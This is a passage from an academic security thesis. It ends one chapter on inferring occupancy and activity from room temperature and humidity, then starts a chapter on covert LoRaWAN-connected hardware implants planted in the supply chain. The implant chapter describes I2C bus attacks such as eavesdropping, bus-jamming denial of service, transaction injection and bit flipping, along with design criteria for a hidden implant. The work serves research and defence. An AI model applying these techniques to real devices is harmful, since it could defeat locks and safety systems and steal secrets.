All our locations are office-like rooms, which have a similar layout (rectangular) but differ in size and furnishing. In our evaluation, the accuracy correlates with the size of the target location. As shown in Figure 3.5, we had the highest average accuracy in occupancy detection with Location C, which has also the smallest ground area of 13.9 m2. Location A has a ground area of 16.5 m2, and has a slightly lower average accuracy. Location B is almost twice as large (30.8 m2) and shows the worst average accuracy compared to the other locations. Thus, our experiment indicates that an increasing room size leads to decreasing accuracy on average. An attacker achieves higher accuracies by monitoring target locations of a small size compared to target locations of larger sizes.

3.5.4 Position of Sensors

According to our threat model in Section 3.2, the attacker controls the target location’s layout. Thus, we assume an attacker who can decide where to install room climate sensors in the target location. We consider how the position of a room climate sensor influences the accuracy of derived information. For occupancy detection, we had the best accuracy with a sensor node that is located in the center point at the ceiling of the target location (Sensors A1, B1, C1). In this position, the sensor has the largest gathering area to measure the climate of the room. Sensors mounted to the walls or on shelves perform differently in our experiments. For occupancy estimation, the best sensors differ per location, i. e., wall-mounted A3 outperforms all others at Location A, whereas B3 (similar to A3) and B1 are almost on par. For activity recognition, the central sensor nodes performed best at Location A and B, but not at Location C. From the attacker perspective, the best position to deploy a room climate sensor is at the ceiling in the center of the target location. In large rooms, multiple sensors at the ceiling could be installed, each covering a subsection of the room.

3.6 Discussion

As our experiments reveal, knowing the temperature and relative humidity of a room al- lows to detect the presence of people and to recognize certain activities with a significantly higher probability than guessing. By evaluating temperature and relative humidity curves of the length of 180 seconds, we were able to detect the presence of an occupant in one of our experimental spaces with an accuracy of 93.5% using a single sensor. Occupancy estimation results show no definitive trend as three out of four sensors perform around guessing chance for deciding between one or two persons, yet, the best accuracies range around 68%. The classification accuracies for the three-class problem, deciding between zero, one, and two persons being present lie consequently between the occupancy detection and one vs. two persons results with 72.2% as best result. In terms of activity recognition,

48 3.6 Discussion we distinguished between four activities with an accuracy up to 56.8%, between three ac- tivities up to 81.0%, and between two activities up to 95.1%. Thus, an attacker focusing on the detection of a specific activity is more successful than an attacker that aims to classify a broader variety of activities. In the following, we discuss implications and limitations of our results.

3.6.1 Privacy Implications

We show that an attacker might be able to infer life and work habits of the occupants from the room climate data. Thus, the attacker is able to distinguish between sitting, standing, and moving, which already might reveal the position and activities of the occupant in the room. Moreover, the attacker can distinguish between upright and sedentary activities, between moving and standing, and between working on the laptop and reading a book. Given the limited amount of recorded sensor data, the achieved accuracies in occupancy detection and activity recognition give a clear indication that occupants are subject to pri- vacy violations according to the threat model described in Section 3.2. However, occupancy estimation respectively activity recognition are not straightforward since the achieved ac- curacies are low respectively differ between the different sensor positions and locations. On the bright side, it is also reassuring that simply increasing the number of sensors is not as ominous as one might fear since the relative accuracy increase is rather slim. In other words, the most restrictive scenario, i. e., one deployed sensor, is sufficient. Hence, for an attacker, the benefit of deploying and exploiting more than one sensor is at least questionable. Further experiments are required for a better assessment of the privacy risks induced by the room climate data. Our work provides promising directions for these assessments. For example, we demonstrated the existence of the information leak with the Na¨ıve Bayes classifier. Na¨ıve Bayes is arguably one of the simplest machine learning classifiers. In future work, it would be interesting to explore upper boundaries for the detection of presence/absence, occupancy estimation, and different activities by using more advanced classifiers such as the recently popular deep learning algorithms.

3.6.2 Location-Independent Classification

An important question is whether it is possible to perform location-independent classifica- tion, i.e., to train the classifier with sensor data of one location and then use it to classify sensor data at the target location that is not similar to the training location in size, layout, and sensor positions. If this was possible, the service providers of smart heating applica- tions would be able to detect occupancy and to recognize activities without having access to the target locations. According to their privacy statements, popular smart thermostats from Nest [220], Ecobee [71], and Honeywell [129] send measured climate data to the service providers’ databases.

49 3 Privacy Implications of Room Climate Data

To evaluate these privacy threats, we used the room climate data of the best-performing sensor of a location as training data set for other locations. For example, to classify events of an arbitrary sensor of Location A, we trained the classifier with room climate data collected by Sensor B1 or Sensor C1. We gained statistically significant results for a few combinations in occupancy detection but the majority of our occupancy detection results was not significant. Since discriminating between one and two persons proved unreliable, occupancy estimation was consequently excluded. For activity recognition, we were not able to gain statistically significant results. However, the possibility of location-independent attackers cannot be excluded. Absence of significant results in our experiments may be merely due to the limited amount of data. Future studies should be conducted to gather data from various rooms up to a point where the combined results hold for arbitrary locations. Having more data from a multitude of rooms available would help the machine learning classifiers to recognize and ignore data characteristics that are specific to either of the experimental rooms. Consequently, the algorithms could better identify the distinct data characteristics of the different classes in occupancy detection and activity recognition. This would enable location-independent classification of room climate data, in which the training location is not similar to the target location regarding size, layout, furnishing, and positions of the sensors.

3.6.3 Policy Implications

In a representative smart home survey of German consumers from 2015, 34% of the partici- pants stated that they are interested in technologies for intelligent heating or are planning to acquire such a system [61]. Another survey with 1,000 US and 600 Canadian con- sumers found that for 72% of them, the most desired smart home device would be a self-adjusting thermostat, and 37% reported that they were likely to purchase one in the next 12 months [135]. Sharing smart home data with providers and third parties is a popular idea and a controversial issue for consumers. Thus, in a recent representative survey with 461 American adults by Pew Research [240], the participants were presented with a scenario of installing a smart thermostat “in return for sharing data about some of the basic activities that take place in your house like when people are there and when they move from room to room”. Of all respondents, 55% said that this scenario was not acceptable for them, 27% said that it was acceptable, with remaining 17% answering “it depends”. Furthermore, in a worldwide survey with 9,000 respondents from nine countries (Australia, Brazil, Canada, France, Germany, India, Mexico, the UK, and the US), 54% of respondents said that “they might be willing to share their personal data collected from their smart home with companies in exchange for money” [138].4 We think that the idea of sharing the smart home data for various benefits will continue to be intensively discussed in the future, and therefore, consumers and policy makers should

4 Methodological details, such as representativeness, breakdown by country and the exact formulation of the questions, are not known about this survey.

50 3.7 Related Work on Occupancy Detection and Activity Recognition be made aware of the level of detail inferable from smart home data. Which rewards are actually beneficial for consumers? Moreover, which kind of data sharing is ethically permissible? Only by answering these questions it would be possible to design fair policies and establish beneficial personal data markets [276]. In this work, we take the first step towards informing the policy for the smart heating scenario.

3.7 Related Work on Occupancy Detection and Activity Recognition

Over the last decade, several experiments have been conducted to detect occupancy in sensor-equipped spaces and to recognize people’s activities as summarized in Table 3.7. Activity recognition has been considered for basic activities, such as leaving or arriving at home, or sleeping [187], as well as for more detailed views, including toileting, showering, and eating [296]. Most of the previous research uses types of sensors that are different from temperature and relative humidity. For example, CO2 represents a useful source for occupancy de- tection and estimation [314]. Additionally, sensors detecting motion based on passive infrared (PIR) [5, 65, 114, 168, 117, 324, 81, 277, 47, 233], sound [73, 114, 102, 233], barometric pressure [195], and door switches [69, 70, 320, 81, 200, 277, 47] are utilized for occupancy estimation. For evaluation, different machine learning techniques are used, e. g., HMM [314, 81], ARHMM [117], ANN [73, 200], Na¨ıve Bayes [338], and decision trees [114, 320, 102, 38, 338, 81]. In contrast to previous work, our results rely exclusively on temperature5 and relative humidity. Previously published experimental results involved other or additional types of sensors, such as CO2, acoustics, motion, or lighting (the latter three are referred to as AML in Table 3.7), door switches or states of appliances (also gathered with the help of switches), such as water taps or WC flushes. For this reason, our detection results are also not directly comparable to these works.

3.8 Conclusion

We investigated the common belief that data collected by room climate sensors divulge private information about the occupants. To this end, we conducted experiments aiming to reflect realistic conditions, i.e., considering an attacker who has access to typical room climate data (temperature and relative humidity) only. Our experiments revealed that knowing a sequence of temperature and relative humidity measurements already allows to detect the presence of people and to recognize certain activities with high accuracy. Contrarily, the distinction between the presence of one or two persons is evidently harder,

5 Note that in [38], additional classification results using temperature as the only predictor are reported in the range of 67% to 87%. The underlying distribution of absence (79%, 64%, and 79%) and presence (21%, 36%, and 21%) in their three datasets is unbalanced and, thus, may have biased the classifier.

51 3 Privacy Implications of Room Climate Data

Table 3.7: Overview of previous experiments on occupancy detection, occupancy estima- tion, and activity recognition with a focus on selected sensors. y hes 2 entilation Temperature CO V Work Target Rel. Humidit AML Switc Wearables van Kasteren et al., 2008 [296] A        Lam et al., 2009 [168] E        Dong et al., 2010 [65] E        Lu et al., 2010 [187] A        Hailemariam et al., ’2011 [114] D        Han et al., 2012 [117] E        Zhang et al., 2012 [324] E        Ekwevugbe et al., 2013 [73] E        Ebadat et al., 2013 [69] E        Ai et al., 2014 [5] E        W¨orneret al., 2014 [314] D        Yang et al., 2014 [320] D/E        Masood et al., 2015 [195] E        Ebadat et al., 2015 [70] E        Candanedo & Feldheim, 2016 [38] D        Mehr et al., 2016 [200] A        Sprint et al., 2016 [277] A        Cicirelli et al., 2016 [47] A        Pedersen et al., 2017 [233] D        Fan et al., 2017 [81] A        Ghaffarzadegan et al., 2017 [102] D/E        Zimmermann et al., 2017 [338] D/E        This work D/E/A       

Notation: ‘D’ - occupancy detection, ‘E’ - occupancy estimation, ‘A’ - activity recognition, ‘AML’ - acoustic, motion, and lighting sensors

52 3.8 Conclusion while using data from two different sensors slightly improves occupancy detection, but activity recognition remains a hard task. Nonetheless, our results confirm that the need for protection of room climate data is justified: the leakage of such ‘inconspicuous’ sensor data as temperature and relative humidity can seriously violate privacy in smart spaces. Future work is required determine the level of privacy invasion in more depth and develop appropriate countermeasures.

53 54 Chapter 4

Malicious IoT Implants

The infrastructure of the IoT provides connectivity for billions of Internet-connected de- vices all over the world. New threats arise with this inter-connectivity as attackers could try to misuse the capabilities of the IoT infrastructure. In this chapter, we present a case study on the threat of connectivity misuse that leverages public IoT infrastructures as a communication channel to control malicious hardware elements over the Internet. Contents

4.1 Introduction ...... 56 4.2 Preliminaries ...... 57 4.2.1 LPWAN Infrastructure ...... 57 4.2.2 Serial Communication ...... 58 4.2.3 I2C Communication Protocol ...... 61 4.3 Threat Model ...... 63 4.3.1 Untrusted Supply Chain ...... 63 4.3.2 Attacker Model ...... 64 4.4 Malicious IoT Implant ...... 65 4.4.1 Design Criteria ...... 65 4.4.2 Attack Procedures ...... 66 4.4.3 Implementation ...... 67 4.5 Evaluation ...... 68 4.5.1 Dimensions ...... 68 4.5.2 Power Consumption ...... 69 4.5.3 Wireless Range ...... 69 4.5.4 Cost ...... 69 4.5.5 Effort of Insertion ...... 69 4.5.6 Feasibility of Attacks ...... 70 4.6 Discussion ...... 73 4.6.1 Limitations ...... 74 4.6.2 Countermeasures ...... 74 4.7 Related Work on Malicious Hardware ...... 76 4.8 Conclusion ...... 77

55 4 Malicious IoT Implants

4.1 Introduction

According to a recent estimation [99], 20.4 billion IoT devices will be installed by the end of 2020. These devices are connected in mostly wireless and local networks all over the world, comprising together a global IoT infrastructure. In the past, security concerns have been expressed regarding this powerful IoT infrastructure: Besides security issues in IoT devices [192, 248], IoT networks [213], and IoT applications [91], the force of these billions of devices can be weaponized for targeted attacks with impactful consequences. Examples are recent denial-of-service (DoS) attacks on Internet infrastructure [12, 157], in which attacker-controlled IoT nodes utilize existing IoT infrastructure to build large botnets. In this chapter, we explore a new threat where the connectivity of low-power wide-area networks (LPWANs) is leveraged as a communication channel to control malicious hard- ware. Our objective is to prove that public IoT infrastructure can be used to perform attacks at hardware level remotely, even if the target device does not feature a network interface. The underlying threat of malicious hardware arises from an untrusted supply chain, in which electronic products are manufactured and shipped in large volumes. The global supply chain of electronic products consists of a number of sequential steps from designing a new product, fabrication process, and distribution to the installation. Hereby, we focus on the physical distribution process that involves entities such as manufacturers, third-party logistics providers, distributors, retailers, and costumers. In addition, govern- ment agencies oversee the flow of goods at borders for legal and documentation purposes. Thus, an electronic product can be physically accessed and manipulated by a number of entities during distribution. These entities could be potential attackers or cooperate with an attacker, and therefore the integrity of an electronic product should not be assumed in general. This contradicts the inherent trust of consumers that new products are not tampered with. Inspired by the leaked NSA ANT catalog [13], we experiment with the insertion of ad- ditional hardware, referred to as hardware implants, into an existing electronic system after the fabrication process. Although the threat of hardware implants seems to be ac- knowledged by the academic security community, previous research on malicious hardware mainly focused on hardware trojans, i.e., diverse types of malicious hardware inserted dur- ing design phase [4, 90, 106, 124, 154, 181] and fabrication phase [24, 267, 318] but not during the distribution phase. As our major contributions in this work, we comprehensively explore a new attack vector: malicious IoT implants. We show that IoT infrastructures can be abused for malicious purposes other than DoS attacks. Although the existence of hardware implants is known [13], we are the first in the scientific community that design and build a malicious IoT implant, a low-cost electronic implant that connects to the Internet over IoT infrastructure. The feasibility of this threat is demonstrated by inserting the implant in exemplary safety- and security-critical target devices. We describe the process of insertion in detail and evaluate real-world constraints such as size, cost, and energy consumption. Finally, we suggest and discuss a number of potential countermeasures.

56 4.2 Preliminaries

Furthermore, we investigate new vulnerabilities on hardware level that exploit insecurities in serial communication on printed circuit boards (PCBs). We start by identifying the de-facto serial communication standards by analyzing over 11,000 microcontroller (MCU) models. Then, we show that serial communication is vulnerable to malicious IoT implants. For our implementation that focuses on the widely-adopted I2C standard, we introduce four attack procedures in which our implant directly interferes with the communication on I2C buses. At the end, we discuss the adoption of these attacks to other serial commu- nication standards. The presented threat is not considered in current threat models for hardware security [250] that mainly cover hardware trojans, side-channel attacks, reverse engineering, piracy of intellectual property, and counterfeiting. Also, guidelines on supply chain risks, such as NIST SP 800-161 [31], consider malicious software insertion but no malicious hardware insertion. Thus, the goal of this chapter is to demonstrate and understand the feasibility of Internet-connected hardware implants and their effects on the security of arbitrary target devices to raise awareness for this novel threat. The remaining part of this chapter is organized as follows: In Section 4.2, we provide an overview on LPWAN infrastructure and serial communication. In Section 4.3, we present the underlying threat model. In Section 4.4, we outline the design and implementation of the malicious hardware implant, and describe the results of the evaluation in Section 4.5. In Section 4.6, we discuss the results and outline countermeasures as well as limitations. Related work on malicious hardware is presented in Section 4.7. The chapter concludes in Section 4.8.

4.2 Preliminaries

In this section, we present preliminaries on LPWAN infrastructure, serial communication, and introduce the I2C communication protocol.

4.2.1 LPWAN Infrastructure

The global IoT infrastructure is split into millions of local networks that are interconnected via the Internet. From an application perspective, these networks can be categorized into body-area, personal-area, local-area, and wide-area networks. In this chapter, we focus on LPWANs, which provide connectivity for thousands of IoT nodes across large geographical areas as their wireless range competes with the ranges of mobile telephony networks. In contrast to mobile telephony networks that support high data rates and bandwidths, LPWANs are specifically designed for low-power machine-to-machine (M2M) applications that communicate at low data rates. As of June 2018, a popular LPWAN technology with deployments in over 100 countries is LoRa [185]. LoRa operates in three frequency bands (433/868/915 MHz) at different chan- nels and bandwidths, and uses a chirp chip spectrum modulation scheme that provides

57 4 Malicious IoT Implants a high resistance against wireless interference. These advanced propagation properties allow transmissions of wireless data over distances of up to a few kilometers. The specifi- cations of LoRaWAN, the LoRa network protocol, are maintained by the LoRa Alliance, a global non-profit organization consisting of more than 500 member companies [184]. From a network perspective, LoRaWAN utilizes a star-to-star architecture, in which so-called gateways relay messages either between IoT nodes or from an IoT node to the central network server and vice versa. The wireless transmissions between IoT nodes and the gateway are based on the LoRa technology, while the Internet Protocol (IP) is used for data transfers between gateways and the central network server. The cost of deploying LPWANs is significant lower than the roll-out of mobile telephony networks such that even non-profit initiatives are able to provide network coverage for entire cities and regions. A prominent example is The Things Network (TTN), a crowd source initiative that claims to have a fast growing community with over 42,000 people in more than 80 countries. The TTN community deploys LoRaWAN gateways world-wide to achieve their objective of enabling a global network for IoT applications without sub- scription costs. According to TTN, 10 gateways are enough to cover a major city like Amsterdam with wireless connectivity for IoT applications. Currently, almost 4,000 TTN gateways are globally deployed. Besides non-profit initiatives, the roll-out of national-wide LPWANs driven by telecommunication companies is ongoing in many countries, e.g., India [151], Australia [244], and the USA [271]. According to a forecast [190], LPWANs will su- persede mobile telephony networks in providing wireless connectivity for IoT applications by 2023.

4.2.2 Serial Communication

Although electronic products provide a large diversity in function, features, and appear- ance, their underlying hardware platform follows similar design principles. Typically, the hardware platform consists of a number of integrated circuits (ICs) that are mounted on PCBs and interconnected via on-board communication interfaces. ICs are a set of electronic circuits that are inseparably and electronically interconnected as one electronic element, often referred to as a chip. From a high level perspective, there exist three types of ICs: analog, digital, and mixed signal. Digital ICs process binary signals and are typ- ically microprocessors (MCUs), memory chips, or digital signal processors (DSPs). In contrast, analog ICs process continuous signals to enable functions such as amplification, demodulation, and filtering of electronic signals. Examples of analog ICs are sensors, am- plifiers, and power management circuits. Mixed signal ICs consist of both, digital and analog circuits. Applications are, for example, the conversion of digital to analog signals and vice versa, denoted as A/D converters and D/A converters. A typical PCB comprises multiple sensors and actuators. Generally, one or more MCUs are present to process the data received from the sensors, as well as memory chips to store data persistently, and network interfaces to communicate with external entities.

58 4.2 Preliminaries

For the communication between ICs exist a number of serial and parallel data transmission mechanisms. In parallel communication, multiple bits are transmitted simultaneously over multiple communication channels. This is in contrast to serial communication, where bits are sent sequentially over a single communication channel. Since the cost of ICs is also determined by the number of input and output pins, ICs on PCBs often use serial communication to interact with each other. Serial communication mechanisms can be categorized into synchronous and asynchronous systems. Synchronous systems associate a clock signal to the data signals, which is shared by all bus participants. In asynchronous systems, the data signals are transmitted without a shared clock signal. Most of the serial communication systems comprise a hierarchy of master and slave ICs. MCUs are typically masters and control the communication as well as command slaves, e.g., memory and sensors, to send data or to execute particular tasks. To determine the most important serial communication interfaces on PCBs, we performed a parametric search on the product databases of six leading MCU suppliers: NXP, Renesas, Microchip, STMicroelectronics (STM), Infineon, and Texas Instruments (TI). In 2016, these suppliers had in sum a market share of 72% of all sold MCUs based on the revenue [134]. We analyzed more than 11,000 MCU models regarding their serial communication interfaces and found that 86.7% have a UART interface, 83.5% support I2C and 63.8% SPI. We also analyzed the support for further serial communication interfaces, such as CAN (34.3%), USB (30.2%), and Ethernet (11.5%), which are mainly application-specific and not as widely supported as SPI, I2C and UART. A detailed analysis can be found in Table 4.1. Although the support of a serial interface is no warrant that this interface is also used in a product that features this MCU, these numbers indicate the de-facto standards that are supported by leading MCU suppliers. Table 4.2 shows a comprehensive overview of the most important on-board serial commu- nication interfaces that we introduce in more detail.

UART. The Universal Asynchronous Receiver/ Transmitter (UART) is a serial com- munication interface that uses two data signals: one for receiving, and another one for transmitting. The communicating parties have to agree on the data rate and are syn- chronized via a start bit. UART supports full-duplex communication, which means that data can be transmitted in both directions simultaneously. UART’s main use case is the communication with external hardware components via cables. In contrast, SPI and I2C are used for the communication of peripheral devices on the same circuit board, and thus for shorter distances.

I2C. The Inter-Integrated Circuit (I2C) bus [222], also known as 2-Wire Interface (TWI), was designed by Philips Semiconductor in 1982 with the objective to provide a simple communication mechanism between ICs on a PCB. The original specifications from 1982 allow 100 kHz communication, use 7 bit addresses, and the number of devices per bus was limited to 112 (as a number of addresses is reserved). I2C requires two signal lines, data

59 4 Malicious IoT Implants

Table 4.1: Number of MCU models sorted by supplier and product families (as of January 2018). If a database entry of an MCU model had no parameter regarding a certain interface, we assume that this interface is not supported. #MCUs that support Supplier MS Family Bit #MCUs UART I2C SPI CAN USB ETH i.MX 32 251 243 243 243 219 243 220 Kinetis 32 928 812 812 812 264 334 72 LPC 32 540 534 531 482 228 276 136 NXP 19% MPC 32 762 0 290 94 475 0 0 S32 32 17 17 6 1 7 0 0 VF 32 35 34 34 34 34 0 0 Various 8 566 550 354 3 36 1 0 Renesas 16% Various 16 2,358 2,304 2,226 485 340 72 0 Various 32 2,318 2,313 2,069 1,924 1,441 1,298 585 AVR 8 49 39 43 45 0 5 0 PIC 8 116 106 104 104 0 0 0 Microchip 14% PIC 16 366 366 366 366 0 58 0 PIC 32 241 241 220 241 0 175 0 SAM 32 255 255 255 255 0 187 0 STM8 8 137 30 42 33 21 0 0 STM 10% STM32 32 799 799 796 794 490 598 167 Various 8 140 140 16 135 0 0 0 Infineon 7% Various 16 156 156 93 145 88 0 0 Various 32 308 205 189 206 29 14 11 MSP430 16 536 471 446 500 0 0 0 DRA 32 28 28 28 28 28 18 25 DSP 32 175 67 72 54 0 54 48 TI 6% Performance 32 254 124 235 248 170 60 0 Sitara 32 43 25 26 26 20 26 37 TDA 32 12 12 12 12 12 8 12 1,008 865 559 320 57 14 0 8 8.8% 85.8% 55.5% 31.7% 5.7% 1.4% 0 3,416 3,297 3,131 1,496 428 130 0 By bit size 16 30.0% 96.5% 91.7% 43.8% 12.5% 3.8% 0 6,966 5,709 5,818 5,454 3,417 3,291 1,313 32 61.2% 81.9% 83.5% 78.3% 49.1% 47.3% 18.9% 11,390 9,871 9,508 7,270 3,902 3,435 1,313 In sum 100.0% 86.7% 83.5% 63.8% 34.3% 30.2% 11.5%

Notation: ‘MS’ - market share of MCU sales by revenue in 2016, ‘Family’ - MCU product family as advertised by the supplier (if applicable), ‘Bit’ - bit size of the MCU architecture, ‘#MCUs’ - number of MCU models, ‘ETH’ - Ethernet. 60 4.2 Preliminaries

Table 4.2: Comparison of serial communication systems. col

Bus system Signal Lines Synchronous Asynchronous Half Duplex Full Duplex Multi-Master Proto UART 2       I2C 2       SPI 3+       and clock, and allows half-duplex communication, i.e., data can be transmitted in both directions but not at the same time. Compared to other serial buses, I2C includes a com- munication protocol that allows masters to communicate with slaves in a coordinated way. I2C is well suited for general purpose communication and electronic products comprising a number of ICs that communicate with each other.

SPI. The Serial Peripheral Interface (SPI) is a serial communication system that uses at least three signals: two data signals and a clock. If the master controls more than one slave, then a further selection signal is required for each slave. SPI is used for full- duplex data transfers that reach data rates up to 1Mbit/s. The main drawback of SPI is the number of signal lines, which increases linearly with the number of slaves. For each slave, an additional select signal line is required, which requires additional I/O pins at the master IC and this adds challenges in placing the signal lines on the PCB. Another drawback is the limitation to only one master. Thus, SPI is well suited for cases in which a single master is connected to one or two slaves and a high data rate in both directions is required.

4.2.3 I2C Communication Protocol

Although serial communication interfaces have diverse properties regarding synchroniza- tion, data rates, and complexity, there are architectural similarities from a security per- spective. The most obvious property of these systems is that none of their specifications define any kind of cryptographic security measure. Therefore, the majority of the demon- strated attacks can also be adapted to other serial communication interfaces. In the im- plementation and evaluation of this work, we focus on the I2C serial bus [222] for following reasons: I2C facilitates a sophisticated communication protocol, in contrast to UART and SPI. Furthermore, I2C and UART are the most widely supported serial communication interfaces, and in 32-bit architectures (which make 61.1% off all evaluated MCU models), I2C is even the most supported serial communication interface.

61 4 Malicious IoT Implants

Figure 4.1: An exemplary I2C bus system with a single master and three slaves.

As shown in Figure 4.1, I2C uses two signal lines: one clock line (denoted as SCL) and one data line (denoted as SDA). ICs are chained along these two signal lines, which are referred to as bus. In order to request and send data from one IC to another, each IC has a distinct address. Furthermore, each IC can be configured to act either as master or slave. The I2C standard supports multiple masters, which can initiate transactions on the bus. The master that currently performs a transaction also generates the clock signal. Slaves cannot start own transactions and remain passive until they respond to the requests of masters. Typical examples of masters are MCUs and processors, while sensors, memory chips, and actuators are usually configured as slaves.

Figure 4.2: An I2C transaction consists of an address frame and one or more data frames.

A transaction between master and slaves contains two types of frames (cf. Figure 4.2): An address frame that informs all participants at the bus for which slave the message is intended, and one or more data frames, each consisting of an 8-bit data block. To start a new transaction, a master sends a start condition indicating its intention to occupy the bus. If more than one master aims to use the bus at the same time, the master get access that pulls the SDA line with a clock signal first. The other masters wait until the current bus master completes its transaction via a stop sequence. Upon receiving a start sequence, all slaves on the bus listen for an address frame. The master sends the 7 bit address of the corresponding slave after which only this particular slave continues listening. Then, the master sends an 8th bit to indicate whether he wants to write or read. Once these 8 bits are sent by the master, the receiving slave sends a bit to acknowledge its readiness to receive data. In case of no explicit acknowledgment bit was received, the master aborts the transaction. After the address frame is sent, the transmission of the data frames starts. Depending on whether the master indicated its intention to read or write, either the master or the slave writes data on the SDA line and the corresponding device acknowledges the receipt. Finally, the master sends a stop condition to complete the transaction.

62 4.3 Threat Model

4.3 Threat Model

Serial communication on PCBs is security-critical as many high-level applications rely on correct data transmissions to function properly. For instance, spoofing of a temperature sensor with false values can have a significant impact on manufacturing processes that require a particular temperature. The injection of wrong gyroscope data into the serial communication of an unmanned aerial vehicle can lead to a crash. Eavesdropping the passcode entered into the pin pad of a safe grants an attacker access to the content without using brute force. The manipulation of loudspeakers in headphones can injure the hearing ability of the user. All these examples show that attacks on serial communication between ICs have serious impacts. To this end, we define following security goals for the serial communication between ICs on PCB boards:

(a) Confidentiality: Only legitimate ICs have access to the data that is transmitted on the serial bus.

(b) Integrity: The tampering with data on the serial bus during transfer is recognized by the legitimate ICs.

(c) Availability: The legitimate ICs always have access to the transmitted data on the serial bus.

In this chapter, we present a threat model that involves a so-called malicious IoT implant. Malicious IoT implants are electronic systems that are inserted into an existing system after the fabrication process, which feature a bidirectional direct wireless connection to a public IoT infrastructure. The system that hosts the implant is denoted as target system. We refer to the entity that inserts the implant into the target system as attacker. The objective of the attacker is to violate the security goals of the serial communication between ICs.

4.3.1 Untrusted Supply Chain

From an economic perspective, a supply chain can be described as a series of inter-related business processes ranging from the acquisition and transformation of raw materials and parts into products to the distribution and promotion of these products to the retailers or customers [204]. The supply chain process can be divided into two main business processes: material management and physical distribution. In this work, we focus on the physical distribution as malicious IoT implants are inserted into the target system after its fabrication. We identified a number of stakeholders that are involved in the physical distribution pro- cess shown in Figure 4.3: Manufacturers use raw materials and parts to produce goods. Distributors buy goods from manufacturers, store and resell them either to retailers or

63 4 Malicious IoT Implants

Figure 4.3: Physical distribution of goods in the supply chain process. Solid lines: flow of goods. Dashed lines: flow of services (third-party logistics providers) or possibility of interception (government agencies). customers. Retailers sell goods to customers. Third-party logistics providers manage the flow of goods between point of origin and destination, which includes shipping, inventory, warehousing, and packaging. Government agencies, e.g., customs inspection, enforce reg- ulations and document the flow of goods in and out of a country. Customers receive and consume goods, while having the ability to choose between different products and suppli- ers. Hence, the physical distribution process provides many entry points for attackers to gain physical access to a target device. Potentially any of these stakeholders can either be an attacker or cooperate with an attacker. Therefore, we assume an untrusted supply chain in our threat model.

4.3.2 Attacker Model

We assume that the attacker has physical access to the target device as described in Sec- tion 4.3.1, and is able to remove the device’s enclosure without leaving physical traces. The attacker identifies access points on the PCB to which a malicious IoT implant can be connected within a reasonable amount of time. We further assume that the target device only requires a power supply, neither Internet nor network access are necessary. The at- tacker succeeds with an attack if the implant is able to interfere with the communication of the serial buses and cannot be detected without opening the enclosure of the product. Thus, we assume that the attacker targets systems that are not likely to be disassembled by the user. Furthermore, we assume that the attacker has access to a public IoT infras- tructure within the wireless range of the implant. In this case, the attacker is not required to be physically present within the wireless range of the implant. The motivations to utilize malicious IoT implants are various. Governmental organizations might have an interest to use this approach for surveillance, industrial espionage, or the manipulation of infrastructure in enemy states. Leaked documents of the National Security

64 4.4 Malicious IoT Implant

Agency [13] indicate the usage of similar malicious hardware for these purposes. Besides governmental entities, criminal organizations and terrorist groups can use malicious IoT implants to achieve similar goals for financial and political profit. All these groups are likely to be experienced in covert operations, and have the potential to access target devices in the supply chain. We further categorize the potential motivations of an attacker to interfere with serial communication on PCBs in four high-level objectives:

1. Disable Services and Infrastructure: The attacker can use a malicious IoT implant to completely disable a serial communication bus of a device. As a result, an MCU or processor cannot communicate with peripheral ICs anymore. This immediately leads to consequences in high-level applications.

2. Bypass Security Mechanisms: Due to the implant’s ability to directly interfere at hardware-level, security mechanisms at software-level can be overruled. An example is a lock using an authentication mechanism such that only authorized people can unlock it. A malicious IoT implant can bypass security mechanisms and send commands directly to the actuator that controls the lock.

3. Bypass Safety Mechanisms: Safety mechanisms can be overruled that same way as security mechanisms. An example is a software-implemented safety mechanism that controls the closing of an elevator door, which can be circumvented by a malicious IoT implant, and in consequence, injure passengers.

4. Exfiltrate Data: A malicious IoT implant can eavesdrop data and commands on the serial bus and forward them via the implant’s wireless interface to the attacker. This way, an attacker gains information about the current state of a device. Also, the attacker might be able to extract secrets, e.g., a passcode entered into a pin pad, or a production machine configuration that reveals a company secret.

4.4 Malicious IoT Implant

In this section, we present the design and implementation of the malicious IoT implant.

4.4.1 Design Criteria

To achieve its objectives, the attacker has certain design criteria regarding the malicious IoT implant:

(C1) Small Dimensions: Size is a constraint as the implant has to be hidden inside the enclosure of the target device. In addition, small dimensions of an implant make detection harder.

65 4 Malicious IoT Implants

(C2) Wireless Connectivity: If the implant should be remotely controlled, it requires a radio transceiver. This transceiver should provide a communication interface to an LPWAN infrastructure such that physical presence of the attacker is not required.

(C3) Access to Serial Communication: The implant acts as a legitimate participant on the serial bus and is able to eavesdrop on legitimate transactions and to insert malicious transactions.

(C4) Invisibility: The implant does not influence the normal mode of operation except during an active attack.

(C5) Low-Power: The implant is either powered by an external power source, i.e., battery or accumulator, or supplied with power from the target device. To increase the lifetime of the implant as well as the target device, the implant should consume as less energy as possible.

(C6) Low-Cost: The implant should be designed in a low-cost way using mainly off-the- shelf components.

To the best of our knowledge, we are the first (in a scientific context) that design and implement an implant, which fulfills all of these design criteria.

4.4.2 Attack Procedures

To achieve the attacker’s high-level objectives, we propose hardware-level attacks that interfere with the communication on the serial bus. To perform these procedures, the implant must be connected to the SDA and SCL signal lines of the target device.

1. Eavesdropping: Eavesdropping is a passive attack in which the implant observes and stores data that is transmitted on the I2C bus. This data can then be relayed to the attacker via the wireless interface of the implant.

2. Denial-of-Service: A DoS disables all communication on the I2C bus. A malicious IoT implant can perform such an active attack by permanently pulling the SDA and SCL lines to a low voltage state. As a result, no further data can be transmitted on the bus. All other bus participants have to wait until the implant releases the signal lines.

3. Injection of Transactions: In this active attack, the implant acts as additional master on the bus. Most implementations offer time gaps between transactions, in which the masters and slaves are in idle state. The implant has the chance to execute own transactions on the bus during this period of time. The injection of own transactions allows to perform further implicit attacks: a) Read out memory and configurations: The implant can read out data from mem- ory chips as well as the configurations of slaves. These information can then be exfiltrated to the attacker via the wireless interface.

66 4.4 Malicious IoT Implant

b) Reconfiguration: The implant can send commands to modify the configuration of slaves consistently. For example, a pre-configured threshold can be altered or, in some cases, a slave could be completely disabled. This ultimately allows for slave impersonation attacks, in which the implant responds to messages of the legitimate master instead of the disabled slave.

4. On-The-Fly Bit Modification Whenever a logical 1 is sent on the I2C bus, the trans- mitting IC releases the SDA signal. A pull-up resistor connected to SDA then pulls the voltage of the signal to high level and the next clock signal carries the bit value. As an active attack, the implant can utilize this idle state to pull the SDA signal to low level, which results in the transmission of a logical 0 instead of the sent logical 1 on the bus. Due to the electronic characteristics of the I2C bus, a modification of logical 0 to logical 1 is not possible.

4.4.3 Implementation

